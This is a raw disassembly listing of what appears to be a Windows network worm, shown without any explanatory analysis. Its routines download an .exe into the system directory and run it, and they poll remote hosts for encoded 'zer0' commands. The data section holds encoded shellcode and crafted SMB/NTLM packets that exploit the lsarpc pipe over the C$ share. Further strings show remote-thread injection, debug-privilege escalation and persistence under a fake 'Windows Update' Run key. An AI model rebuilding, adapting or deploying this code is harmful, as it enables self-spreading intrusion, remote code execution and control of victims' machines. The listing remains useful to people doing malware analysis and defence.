lea eax, [ebp+var_84]
push eax
push 0
call sub_31002476
add esp, 1Ch
jmp short loc_3100267B
; ---------------------------------------------------------------------------
loc_3100261D: ; CODE XREF: sub_31002542+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_31001054 ; lstrcmpiA
test eax, eax
jnz short loc_31002666
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_31002264
add esp, 14h
test eax, eax
jnz short loc_3100267B
push ebx
push edi
push esi
mov dword_31004FE0, 1
call sub_3100222F
add esp, 0Ch
jmp short loc_3100267B
; ---------------------------------------------------------------------------
loc_31002666: ; CODE XREF: sub_31002542+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_31002476
pop ecx
pop ecx
loc_3100267B: ; CODE XREF: sub_31002542+1F�j
; sub_31002542+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31002542 endp
; =============== S U B R O U T I N E =======================================
sub_31002680 proc near ; CODE XREF: sub_31001C18+7A�p
; sub_310026A6+CA�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_3100104C ; VirtualAlloc
retn
sub_31002680 endp
; =============== S U B R O U T I N E =======================================
sub_31002694 proc near ; CODE XREF: sub_310026A6+10B�p
; sub_31002A44+E1�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31001048 ; VirtualFree
retn
sub_31002694 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310026A6 proc near ; CODE XREF: sub_31002928+102�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_3100112C ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_310026D1
push 1
jmp loc_31002767
; ---------------------------------------------------------------------------
loc_310026D1: ; CODE XREF: sub_310026A6+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_31001058 ; GetSystemDirectoryA
mov edi, dword_3100105C
lea eax, [ebp+var_110]
push offset asc_31004CAC ; "\\"
push eax
call edi ; lstrcatA
lea eax, [ebp+var_110]
push 6
push eax
call dword_3100107C ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_310019D4
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset a_exe ; ".exe"
push eax
call edi ; lstrcatA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_310010C8 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31002747
push 2
jmp short loc_31002767
; ---------------------------------------------------------------------------
loc_31002747: ; CODE XREF: sub_310026A6+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31001128 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_3100276A
push [ebp+var_4]
call dword_31001098 ; CloseHandle
push 3
loc_31002767: ; CODE XREF: sub_310026A6+26�j
; sub_310026A6+9F�j
pop eax
jmp short loc_310027BB
; ---------------------------------------------------------------------------
loc_3100276A: ; CODE XREF: sub_310026A6+B4�j
mov edi, 100000h
push edi
call sub_31002680
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31001124 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_31001044 ; WriteFile
push [ebp+var_4]
call dword_31001098 ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31001A04
push ebx
call sub_31002694
add esp, 0Ch
xor eax, eax
loc_310027BB: ; CODE XREF: sub_310026A6+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_310026A6 endp
; =============== S U B R O U T I N E =======================================
sub_310027C0 proc near ; CODE XREF: sub_31002928+9D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_310027D7: ; CODE XREF: sub_310027C0+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_310027D7
pop edi
pop esi
pop ebx
retn
sub_310027C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3100281C proc near ; CODE XREF: sub_310028A1+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_3100284F
add ebx, 1Ah
loc_3100284F: ; CODE XREF: sub_3100281C+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_310010EC
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31002879
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_3100289C
; ---------------------------------------------------------------------------
loc_31002879: ; CODE XREF: sub_3100281C+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31002899
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_3100289C
; ---------------------------------------------------------------------------
loc_31002899: ; CODE XREF: sub_3100281C+68�j
mov al, [ebp+arg_0]
loc_3100289C: ; CODE XREF: sub_3100281C+5B�j
; sub_3100281C+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_3100281C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310028A1 proc near ; CODE XREF: sub_31002928+8B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_310028FE
mov edi, [ebp+arg_0]
push ebx
loc_310028B6: ; CODE XREF: sub_310028A1+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_3100281C
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_310028E2
cmp bl, 7Ah
jg short loc_310028E2
movsx esi, bl
sub esi, 61h
loc_310028E2: ; CODE XREF: sub_310028A1+34�j
; sub_310028A1+39�j
cmp bl, 41h
jl short loc_310028F2
cmp bl, 5Ah
jg short loc_310028F2
movsx esi, bl
sub esi, 41h
loc_310028F2: ; CODE XREF: sub_310028A1+44�j
; sub_310028A1+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_310028B6
pop ebx
jmp short loc_31002901
; ---------------------------------------------------------------------------
loc_310028FE: ; CODE XREF: sub_310028A1+F�j
mov edi, [ebp+arg_0]
loc_31002901: ; CODE XREF: sub_310028A1+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_310028A1 endp
; =============== S U B R O U T I N E =======================================
sub_31002908 proc near ; CODE XREF: sub_31002928+A6�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_3100290C: ; CODE XREF: sub_31002908+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_3100290C
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_31002908 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002928 proc near ; CODE XREF: sub_31002A44+DA�p
var_13C = byte ptr -13Ch
var_3C = byte ptr -3Ch
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 13Ch
push esi
push edi
push offset aZer0 ; "zer0"
mov [ebp+var_4], 1
push [ebp+arg_0]
call dword_310010F4 ; strstr
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_31002A3D
add edi, 4
jz loc_31002A3D
push edi
call dword_3100107C ; lstrlenA
cmp eax, 50h
jle loc_31002A3D
movsx eax, byte ptr [edi]
and byte ptr [edi+100h], 0
sub eax, 61h
mov [ebp+arg_0], eax
js loc_31002A3D
cmp eax, 1Ah
jge loc_31002A3D
inc edi
push 7Eh
push edi
call dword_310010EC ; strchr
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz loc_31002A3D
push ebx
mov bl, [esi]
push [ebp+arg_0]
and byte ptr [esi], 0
lea eax, [ebp+var_13C]
push edi
push eax
call sub_310028A1
xor edi, edi
lea eax, [ebp+var_3C]
push edi
push eax
lea eax, [esi+2]
mov [esi], bl
push eax
call sub_310027C0
lea eax, [ebp+var_3C]
push eax
call sub_31002908
add esp, 1Ch
cmp [esi+1], al
pop ebx
jnz short loc_31002A3D
push 44h
lea eax, [ebp+var_C]
push offset dword_31004CB4
push eax
call sub_31001190
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_3C]
push 30h
push eax
lea eax, [ebp+var_13C]
push eax
call dword_3100107C ; lstrlenA
push eax
lea eax, [ebp+var_13C]
push eax
lea eax, [ebp+var_C]
push eax
call sub_310011FB
add esp, 18h
test eax, eax
jnz short loc_31002A33
cmp [ebp+arg_0], edi
jz short loc_31002A33
lea eax, [ebp+var_13C]
push eax
call sub_310026A6
pop ecx
mov [ebp+var_4], edi
loc_31002A33: ; CODE XREF: sub_31002928+F4�j
; sub_31002928+F9�j
lea eax, [ebp+var_C]
push eax
call sub_310011DF
pop ecx
loc_31002A3D: ; CODE XREF: sub_31002928+26�j
; sub_31002928+2F�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_31002928 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002A44 proc near ; CODE XREF: UPX0:31002B54�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31002680
pop ecx
mov edi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31001040 ; GetLocaleInfoA
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
jz short loc_31002AAC
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_31004FBC
push dword_31004FD4
push offset aDfashnzdsdl ; "dfashnzdsdl"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s?scn=%d?inf=%d"...
push eax
call dword_3100111C ; wsprintfA
add esp, 1Ch
jmp short loc_31002AC4
; ---------------------------------------------------------------------------
loc_31002AAC: ; CODE XREF: sub_31002A44+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3100111C ; wsprintfA
add esp, 0Ch
loc_31002AC4: ; CODE XREF: sub_31002A44+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_3100112C ; InternetOpenA
push ebx
push ebx
push ebx
lea ecx, [ebp+var_84]
push ebx
push ecx
push eax
mov [ebp+arg_0], eax
call dword_31001128 ; InternetOpenUrlA
lea ecx, [ebp+var_4]
mov esi, 2000h
push ecx
push esi
push edi
push eax
mov [ebp+arg_4], eax
call dword_31001124 ; InternetReadFile
loc_31002AFD: ; CODE XREF: sub_31002A44+D3�j
lea eax, [ebx+edi]
push 4
push eax
push offset aZer0_0 ; "zer0"
call sub_31002BD6 ; memcmp
add esp, 0Ch
test eax, eax
jz short loc_31002B1B
inc ebx
cmp ebx, esi
jl short loc_31002AFD
jmp short loc_31002B24
; ---------------------------------------------------------------------------
loc_31002B1B: ; CODE XREF: sub_31002A44+CE�j
add ebx, edi
push ebx
call sub_31002928
pop ecx
loc_31002B24: ; CODE XREF: sub_31002A44+D5�j
push edi
call sub_31002694
mov esi, dword_31001130
pop ecx
push [ebp+arg_4]
call esi ; InternetCloseHandle
push [ebp+arg_0]
call esi ; InternetCloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_31002A44 endp
; ---------------------------------------------------------------------------
loc_31002B40: ; DATA XREF: sub_31001E06+E9�o
push esi
loc_31002B41: ; CODE XREF: UPX0:31002B89�j
xor esi, esi
loc_31002B43: ; CODE XREF: UPX0:31002B87�j
inc esi
inc esi
mov al, byte_31004D34[esi+esi*4]
push eax
push off_31004D35[esi+esi*4]
call sub_31002A44
pop ecx
pop ecx
call dword_310010F8 ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31001AC9
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_31001080 ; Sleep
cmp esi, 14h
jb short loc_31002B43
jmp short loc_31002B41
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002B8C proc near ; CODE XREF: sub_31001262+128�p
; sub_31001262+134�p ...
jmp dword_31001108
sub_31002B8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002B92 proc near ; CODE XREF: sub_31001262+9C�p
; sub_31001262+C5�p ...
jmp dword_31001104
sub_31002B92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002B98 proc near ; CODE XREF: sub_31001262+93�p
; sub_31001262+B2�p ...
jmp dword_31001100
sub_31002B98 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31002BA0 proc near ; CODE XREF: sub_31001262+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31002BC0
loc_31002BAC: ; CODE XREF: sub_31002BA0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31002BAC
loc_31002BC0: ; CODE XREF: sub_31002BA0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31002BA0 endp
; ---------------------------------------------------------------------------
align 10h
loc_31002BD0: ; DATA XREF: sub_31001E06+A�o
jmp dword ptr loc_310010F0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002BD6 proc near ; CODE XREF: sub_31002A44+C4�p
jmp dword_310010E8
sub_31002BD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002BDC proc near ; CODE XREF: sub_31002310+AB�p
jmp dword_31001074
sub_31002BDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002BE2 proc near ; CODE XREF: sub_31002310+64�p
jmp dword_3100106C
sub_31002BE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002BE8 proc near ; CODE XREF: sub_31002310+2D�p
jmp dword_31001068
sub_31002BE8 endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 504h dup(0)
byte_31004000 db 0EBh ; DATA XREF: sub_31001262+24E�o
; sub_31001262+260�o ...
db 58h
word_31004002 dw 7468h ; DATA XREF: sub_310020F4+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999AAh, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_310042C8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_31001262+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31004354 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_31004400 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_310044E0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_31001262+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_31004544 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_310045B0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31004654 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_310046D4 dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31004768 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_310047D4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31004848 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31004906 dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31004940 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_31001262+41B�o
; sub_31001262+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_310049B8: ; DATA XREF: sub_31001262+44A�o
jmp short loc_310049C0
; ---------------------------------------------------------------------------
jmp short loc_310049C2
; ---------------------------------------------------------------------------
align 10h
loc_310049C0: ; CODE XREF: UPX0:loc_310049B8�j
; DATA XREF: sub_31001262+5C�o
pop esp
pop esp
loc_310049C2: ; CODE XREF: UPX0:310049BA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_310049CC dd 1CEC8166h dword_310049D0 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_310017C9+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_310017C9+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_310017C9+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_310017C9+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_310017C9+8�o
; sub_31001E06+BA�o
align 4
aUterm13 db 'uterm13',0 ; DATA XREF: sub_31001851:loc_31001936�o
; UPX0:31001DA5�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31001851+58�o
align 10h
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31001851:loc_31001898�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31001851+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31001851+18�o
align 10h
dword_31004A80 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31001ADF+F9�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31001ADF+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31001ADF+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
a_exe db '.exe',0 ; DATA XREF: sub_31001ADF+55�o
; sub_31002476+4B�o ...
align 4
aGet db 'GET',0 ; DATA XREF: sub_31001ADF+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31001D90�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_31001E06+C1�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_31001E06+B3�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_31001E06+AC�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_31001E06+9F�o
align 4
aU12 db 'u12',0 ; DATA XREF: sub_31001E06+8D�o
aU11 db 'u11',0 ; DATA XREF: sub_31001E06+81�o
aU10 db 'u10',0 ; DATA XREF: sub_31001E06+75�o
aU9 db 'u9',0 ; DATA XREF: sub_31001E06+69�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_31001E06+5D�o
align 10h
aU12x db 'u12x',0 ; DATA XREF: sub_31001E06+51�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_31001E06+45�o
align 10h
aU10x db 'u10x',0 ; DATA XREF: sub_31001E06+3B�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_31001E06+22�o
align 10h
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_310020F4+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_31001C18+23�o
; sub_310023C8+5F�o ...
align 4
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_31001C18+1C�o
; sub_31002476+87�o ...
align 4
aDfashnzdsdl db 'dfashnzdsdl',0 ; DATA XREF: sub_31002542+57�o
; sub_31002542+8A�o ...
dd 3 dup(0)
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31002542+32�o
aClient db 'Client',0 ; DATA XREF: sub_31002542+BC�o
; sub_31002542+F8�o
align 10h
aId db 'ID',0 ; DATA XREF: sub_31002542+37�o
; sub_31002542+75�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_310023C8+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_310023C8+47�o
align 10h
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_310023C8+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_310023C8+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_310023C8+32�o
align 10h
